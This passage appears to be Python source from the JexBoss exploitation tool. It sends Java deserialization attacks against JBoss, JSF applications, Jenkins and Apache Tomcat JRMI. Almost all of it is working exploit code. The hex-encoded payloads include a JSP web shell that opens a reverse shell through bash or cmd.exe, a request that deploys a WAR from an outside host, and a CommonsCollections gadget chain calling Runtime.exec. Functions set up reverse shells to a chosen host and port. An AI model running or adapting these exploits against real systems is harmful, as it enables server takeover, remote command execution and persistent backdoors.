"\x53\x74\x72\x65\x61\x6D\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74"
"\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x46\x61\x69\x6C"
"\x65\x64\x20\x74\x6F\x20\x63\x68\x65\x63\x6B\x20\x66\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22"
"\x29\x3B\x7D\x74\x72\x79\x7B\x50\x72\x6F\x63\x65\x73\x73\x20\x70\x3B\x62\x6F\x6F\x6C\x65\x61\x6E"
"\x20\x6E\x69\x78\x3D\x74\x72\x75\x65\x3B\x69\x66\x28\x21\x53\x79\x73\x74\x65\x6D\x2E\x67\x65\x74"
"\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6C\x65\x2E\x73\x65\x70\x61\x72\x61\x74\x6F\x72"
"\x22\x29\x2E\x65\x71\x75\x61\x6C\x73\x28\x22\x2F\x22\x29\x29\x7B\x6E\x69\x78\x3D\x66\x61\x6C\x73"
"\x65\x3B\x7D\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x6A\x65\x78\x72\x65\x6D"
"\x6F\x74\x65\x3D\x22\x29\x21\x3D\x2D\x31\x29\x7B\x53\x6F\x63\x6B\x65\x74\x20\x73\x63\x3D\x6E\x65"
"\x77\x20\x53\x6F\x63\x6B\x65\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3D\x22\x29\x5B\x31"
"\x5D\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2C\x49\x6E\x74\x65\x67\x65\x72\x2E"
"\x70\x61\x72\x73\x65\x49\x6E\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x31"
"\x5D\x29\x29\x3B\x69\x66\x28\x6E\x69\x78\x29\x7B\x73\x68\x3D\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73"
"\x68\x22\x3B\x7D\x65\x6C\x73\x65\x7B\x73\x68\x3D\x22\x63\x6D\x64\x2E\x65\x78\x65\x22\x3B\x7D\x70"
"\x3D\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78"
"\x65\x63\x28\x73\x68\x29\x3B\x28\x6E\x65\x77\x20\x72\x76\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x73\x63\x2E\x67\x65\x74\x4F\x75\x74\x70\x75\x74\x53\x74"
"\x72\x65\x61\x6D\x28\x29\x29\x29\x2E\x73\x74\x61\x72\x74\x28\x29\x3B\x28\x6E\x65\x77\x20\x72\x76"
"\x28\x73\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x70\x2E\x67"
"\x65\x74\x4F\x75\x74\x70\x7A\x00\x00\x01\xDB\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x2E"
"\x73\x74\x61\x72\x74\x28\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x69\x66\x28\x6E\x69\x78\x29\x7B\x70\x3D"
"\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65"
"\x63\x28\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x5B\x5D\x7B\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73"
"\x68\x22\x2C\x22\x2D\x63\x22\x2C\x73\x68\x7D\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x70\x3D\x52\x75\x6E"
"\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65\x63\x28\x22"
"\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x43\x20\x22\x2B\x73\x68\x29\x3B\x7D\x62\x72\x3D\x6E\x65\x77"
"\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65\x72\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75\x74"
"\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53\x74\x72\x69\x6E\x67\x20\x64\x3D\x62\x72\x2E\x72"
"\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x77\x68\x69\x6C\x65\x28\x64\x20\x21\x3D\x20\x6E\x75\x6C"
"\x6C\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x64\x29\x3B\x64\x3D\x62\x72\x2E\x72"
"\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70"
"\x74\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x55\x6E\x6B"
"\x6E\x6F\x77\x6E\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x22\x29\x3B\x7D\x7D\x25\x3E\x73\x72\x00\x11\x6A"
"\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x42\x6F\x6F\x6C\x65\x61\x6E\xCD\x20\x72\x80\xD5\x9C\xFA\xEE"
"\x02\x00\x01\x5A\x00\x05\x76\x61\x6C\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61"
"\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00"
"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
"\x67\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x74\x00\x07\x62\x6F\x6F\x6C\x65"
"\x61\x6E\xF9\x12\x63\x17\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6F\x72\x67"
"\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x49\x6E\x76\x6F\x63\x61"
"\x74\x69\x6F\x6E\x4B\x65\x79\xB8\xFB\x72\x84\xD7\x93\x85\xF9\x02\x00\x01\x49\x00\x07\x6F\x72\x64"
"\x69\x6E\x61\x6C\x78\x70\x00\x00\x00\x04\x70\x78")
headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
r = gl_http_pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
jexboss.print_and_flush(" Retrying...")
gl_http_pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
return get_successfully(url, "/jexinv4/jexinv4.jsp")
def exploit_web_console_invoker(url):
"""
Exploits web console invoker (/web-console/Invoker)
In Jboss 5, this method only works to deploy a .war within the server fs (not http).
:param url: The URL to exploit
:return: The HTTP status code
"""
payload = ("\xAC\xED\x00\x05\x73\x72\x00\x2E\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x63\x6F\x6E\x73\x6F"
"\x6C\x65\x2E\x72\x65\x6D\x6F\x74\x65\x2E\x52\x65\x6D\x6F\x74\x65\x4D\x42\x65\x61\x6E\x49\x6E\x76"
"\x6F\x63\x61\x74\x69\x6F\x6E\xE0\x4F\xA3\x7A\x74\xAE\x8D\xFA\x02\x00\x04\x4C\x00\x0A\x61\x63\x74"
"\x69\x6F\x6E\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72"
"\x69\x6E\x67\x3B\x5B\x00\x06\x70\x61\x72\x61\x6D\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C"
"\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x09\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x74"
"\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x10"
"\x74\x61\x72\x67\x65\x74\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x74\x00\x1D\x4C\x6A\x61\x76\x61"
"\x78\x2F\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2F\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x3B"
"\x78\x70\x74\x00\x06\x64\x65\x70\x6C\x6F\x79\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61"
"\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A"
"\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74"
"\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x01\x4C\x00\x04\x66\x69\x6C\x65"
"\x71\x00\x7E\x00\x01\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x01\x4C\x00\x08\x70\x72\x6F\x74"
"\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x01\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x01\x78\x70\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\x74\x00\x0E\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2E\x63\x6F\x6D\x74"
"\x00\x0F\x2F\x72\x6E\x70\x2F\x6A\x65\x78\x77\x73\x34\x2E\x77\x61\x72\x71\x00\x7E\x00\x0B\x74\x00"
"\x04\x68\x74\x74\x70\x70\x78\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53"
"\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74"
"\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x73\x72\x00\x1B\x6A\x61\x76\x61\x78\x2E"
"\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x0F\x03\xA7"
"\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x21\x6A\x62\x6F\x73\x73\x2E\x73\x79\x73\x74\x65"
"\x6D\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x4D\x61\x69\x6E\x44\x65\x70\x6C\x6F\x79\x65\x72\x78")
headers = {
"Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
r = gl_http_pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
jexboss.print_and_flush(" Retrying...")
gl_http_pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
return get_successfully(url, "/jexws4/jexws4.jsp")
def exploit_servlet_deserialization(url, host, port, cmd, is_win, gadget, gadget_file):
"""
Exploits java deserialization in generic (JAX RS, B...) servlets
tested and working in many application servers with exposed servlet and commons-collections in classpath
:param url: The URL to exploit
:param host: host to make a reverse shell connection
:param port: port to make a reverse shell conneciton
:param cmd: commando to be executed in vulnerable server
:param is_win: if the target is windows
:param gadget: gadget type to generate exploit payload
:return: The HTTP status code
"""
if gadget_file is None:
cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win)
payload = get_payload_gadget(gadget_type=gadget, cmd=cmd)
else:
try:
with open(gadget_file, 'rb') as f:
payload = f.read()
except:
jexboss.print_and_flush(RED + "\n * The \"%s\" file could not be found. Make sure the name is correct or let the\n"
" the tool generate the payload itself.\n" % (gadget_file) + ENDC)
return 505
headers = {
"Content-Type": "application/x-java-serialized-object; class=github.com/joaomatosf/jexboss",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
r = gl_http_pool.urlopen('POST', url, redirect=False, headers=headers, body=payload)
if r.status == 200:
return 201
else:
return r.status
def exploit_application_deserialization(url, host, port, cmd, is_win, param, force, gadget_type, show_payload, gadget_file):
"""
Exploits java deserialization in POST parameters
Tested and working on multiple JSF, Seam and Struts applications running in JDK 6, 7 and 8.
:param url: JSF application URL
:param host: remote host to make a reverse shell connection
:param port: remote port to make a reverse shell connection
:param cmd: command to be executed into the exploited server
:param is_win: indicate that the command to be executed is for a windows system (cmd.exe /C)
:param param: the post parameter to inject the java serialized object
:param force: force send payload to url provided
:param gadget_type: the gadget type to generate the payload
:param show_payload: show generated payload
:param gadget_file: load user gadget from file
:return: The HTTP Status code
"""
param_content = None
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent(),
"Content-Type": "application/x-www-form-urlencoded"}
if gadget_file is None:
cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win)
payload = get_payload_gadget(gadget_type=gadget_type, cmd=cmd)
else:
try:
with open(gadget_file, 'rb') as f:
payload = f.read()
except:
jexboss.print_and_flush(RED + "\n * The \"%s\" file could not be found. Make sure the name is correct or let the\n"
" the tool generate the payload itself.\n" % (gadget_file) + ENDC)
return 505
out = BytesIO()
with gzip.GzipFile(fileobj=out, mode="wb") as f:
f.write(payload)
gift_gziped = base64.b64encode(out.getvalue())
gift_b64 = base64.b64encode(payload)
gift_raw = payload
# if force mode, sends payload in multiple formats
if force:
if param != "": param += "="
jexboss.print_and_flush(GREEN + "\n * Sending serialized object to: %s...\n" % (url) + ENDC)
try:
gl_http_pool.request('POST', url, redirect=False, headers=headers, body=param + url_encode(gift_gziped))
gl_http_pool.request('POST', url, redirect=False, headers=headers, body=param + url_encode(gift_b64))
gl_http_pool.request('POST', url, redirect=False, headers=headers, body=param + gift_raw)
if param != "":
r = gl_http_pool.request('POST', url, redirect=False, headers=headers, body=gift_raw)
headers['Content-Type'] = "application/x-java-serialized-object; class=github.com/joaomatosf/jexboss"
r = gl_http_pool.request('POST', url, redirect=False, headers=headers, body=gift_raw)
except:
# Error sending the exploit payload...
# import traceback, sys
# traceback.print_exc(file=sys.stdout)
return 505
else:
# open initial page for get cookie
r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
cookie = r.getheader('set-cookie')
if cookie is not None: headers['Cookie'] = cookie
# Forbidden
if r.status == 403: return 403
# find for java serialized object in the initial page
param_content = get_serialized_obj_from_param(str(r.data), param)
# If does not exists a java serialized object in the initial page, check if it's a redirect page
if param_content is None:
redirect_link = get_html_redirect_link(str(r.data))
if redirect_link is not None:
r = gl_http_pool.request('GET', url + "/" + redirect_link, redirect=True, headers=headers)
param_content = get_serialized_obj_from_param(str(r.data), param)
# if param to be exploited is not ViewState, get the current viewState
if param != 'javax.faces.ViewState':
view_state = get_viewstate_value(str(r.data))
if view_state is not None:
param = "javax.faces.ViewState=" + url_encode(view_state) + "&" + param
if param != "": param += "="
# correct the url for POST
url = url.split('?')[0]
list_url_tokens = url.split('://')[-1].split('/')
# if user not provided jsf page (if after / is not param or in the last param not exist a dot)
if len(list_url_tokens) <= 1 or '.' not in list_url_tokens[-1]:
# extract the url authority and link for post and make a new url to exploit
link = get_link_for_post(str(r.data))
url_base = get_url_base(url)
url = url_base + link
jexboss.print_and_flush(GREEN + "\n [*] Sending serialized object to:\n"
" --> %s...\n" % (url) + ENDC)
try:
if param_content.startswith("H4sI"):
if show_payload: shows_payload(gift_gziped, gadget_file if gadget_file is not None else gadget_type)
r = gl_http_pool.request('POST', url, redirect=True, headers=headers,body=param + url_encode(gift_gziped))
elif param_content.startswith("rO0"):
if show_payload: shows_payload(gift_b64, gadget_file if gadget_file is not None else gadget_type)
r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=param + url_encode(gift_b64))
else:
r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=param + gift_raw)
except Exception as err:
if 'too many redirects' in str(err):
return 200
else:
return 505
if r.status in (301, 302):
return 200
else:
return r.status
def exploit_jenkins(url, host, port, cmd, is_win, gadget, show_payload):
"""
Exploits java deserialization in POST parameters
Tested and working on multiple JSF applications running in JDK6, 7 and 8.
:param url: url of the jenkins
:param host: remote host to make a reverse shell connection
:param port: remote port to make a reverse shell connection
:param cmd: command to be executed into the exploited server
:param is_win: indicate that the command to be executed is for a windows system (cmd.exe /C)
:param gadget: the gadget type to generate the payload
:param show_payload: show generated payload
:return: The HTTP Status code
"""
# stage 1: find client port
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
cli_port = None
cli_ip = None
# get cli port and cli ip
if '://' in url:
cli_ip = url.split('://')[1].split('/')[0].split(':')[0]
else:
cli_ip = url.split('/')[0].split(':')[0]
r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
all_headers = r.getheaders()
for h in all_headers:
if 'CLI-Port' in h:
cli_port = int(all_headers[h])
break
# if the cli port or ip was not found
if cli_port is None or cli_ip is None: return 505
# stage 2: connect to CLI port and send payload (message + gadget )
# generate payload
payload = b"<===[JENKINS REMOTING CAPACITY]===>"
cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win)
if gadget == 'commons-collections3.1':
gadget = 'groovy1'
payload_gadget = get_payload_gadget(gadget_type=gadget, cmd=cmd)
gift_b64 = base64.b64encode(payload_gadget)
payload += gift_b64
jexboss.print_and_flush(GREEN + "\n * Sending serialized object to: %s:%s\n" % (cli_ip, cli_port) + ENDC)
# establishes connection and send the payload
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(7)
s.connect((cli_ip, cli_port))
s.send(b"\x00\x14Protocol:CLI-connect")
# receive all messages from the server
while b'JENKINS REMOTING CAPACITY' not in s.recv(1024): pass
s.send(payload)
s.close()
except socket.error as err:
jexboss.print_and_flush(RED + "\n * [ERROR]: %s (%s:%s).\n" % (err,cli_ip, cli_port )+ ENDC)
return 505
# if no erros ocorred, consider that payload was send successfuly
return 200
def exploit_jrmi(url, host, port, cmd, is_win):
'''
JRMI Deserialization CVE-2016-8735 and CVE-2016-8735
Apache Tomcat 9.0.0.M1 to 9.0.0.M11
Apache Tomcat 8.5.0 to 8.5.6
Apache Tomcat 8.0.0.RC1 to 8.0.38
Apache Tomcat 7.0.0 to 7.0.72
Apache Tomcat 6.0.0 to 6.0.47
This exploits requires the listers org.apache.catalina.mbeans.JmxRemoteLifecycleListener in tomcat
The payload uses CommonsCollection gadget baseed on ysoserial.
:param url: IP and Port from JRMI
:param host: host for reverse connection
:param port: port for reverse connection
:param cmd: command to be executed
:param is_win: especify if the command is for windos
:param gadget: gadget type
:param show_payload: print the payload generated
:return: result code
'''
cmd = generate_cmd_for_runtime_exec(cmd=cmd, host=host, port=port, is_win=is_win)
try:
host_rmi = url.split(':')[0]
port_rmi = int(url.split(':')[1])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(7)
s.connect((host_rmi,port_rmi))
payload = (b"\x50\xAC\xED\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4D\xC9\xD4\xE6\x3B\xDF\x74\x00\x16\x6A\x65\x78\
\x62\x6F\x73\x73\x20\x31\x33\x34\x38\x34\x39\x35\x35\x31\x32\x31\x36\x39\x35\x73\x7D\x00\x00\x00\
\x01\x00\x0F\x6A\x61\x76\x61\x2E\x72\x6D\x69\x2E\x52\x65\x6D\x6F\x74\x65\x70\x78\x72\x00\x17\x6A\
\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\
\xDA\x20\xCC\x10\x43\xCB\x02\x00\x01\x4C\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\
\x6E\x67\x2F\x72\x65\x66\x6C\x65\x63\x74\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\
\x64\x6C\x65\x72\x3B\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\
\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\
\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\
\x02\x4C\x00\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\
\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\
\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x70\x78\x70\x73\x72\x00\x11\x6A\x61\x76\x61\
\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\
\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\
\x64\x70\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\
\x7E\x00\x00\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\x65\x74\
\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03\x00\x00\x70\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\
\x00\x00\x00\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\
\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\
\x54\x69\x65\x64\x4D\x61\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02\x4C\
\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\
\x74\x3B\x4C\x00\x03\x6D\x61\x70\x71\x00\x7E\x00\x06\x70\x78\x70\x74\x00\x03\x66\x6F\x6F\x73\x72\
\x00\x2A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\
\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A\x79\x4D\x61\x70\x6E\xE5\x94\x82\
\x9E\x79\x10\x94\x03\x00\x01\x4C\x00\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\
\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\
\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x70\x78\x70\x73\x72\x00\x3A\x6F\
\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\
\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\x61\x69\x6E\x65\x64\x54\x72\
\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\
\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72\x67\x2F\x61\x70\x61\
\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\
\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x70\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72\x67\
\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\
\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\
\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\
\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\
\x63\x74\x6F\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\
\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\x43\x6F\x6E\x73\x74\x61\x6E\x74\
\x71\x00\x7E\x00\x0E\x70\x78\x70\x76\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\
\x6E\x74\x69\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3A\x6F\
\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\
\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72\
\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38\x02\x00\x03\x5B\x00\x05\x69\
\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\
\x74\x3B\x4C\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\
\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\
\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\
\x70\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\
\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\
\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\
\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\
\x00\x74\x00\x09\x67\x65\x74\x4D\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x25\x00\x00\x00\x02\x76\
\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\xA0\xF0\xA4\x38\x7A\
\x3B\xB3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7E\x00\x25\x73\x71\x00\x7E\x00\x1D\x75\x71\x00\
\x7E\x00\x22\x00\x00\x00\x02\x70\x75\x71\x00\x7E\x00\x22\x00\x00\x00\x00\x74\x00\x06\x69\x6E\x76\
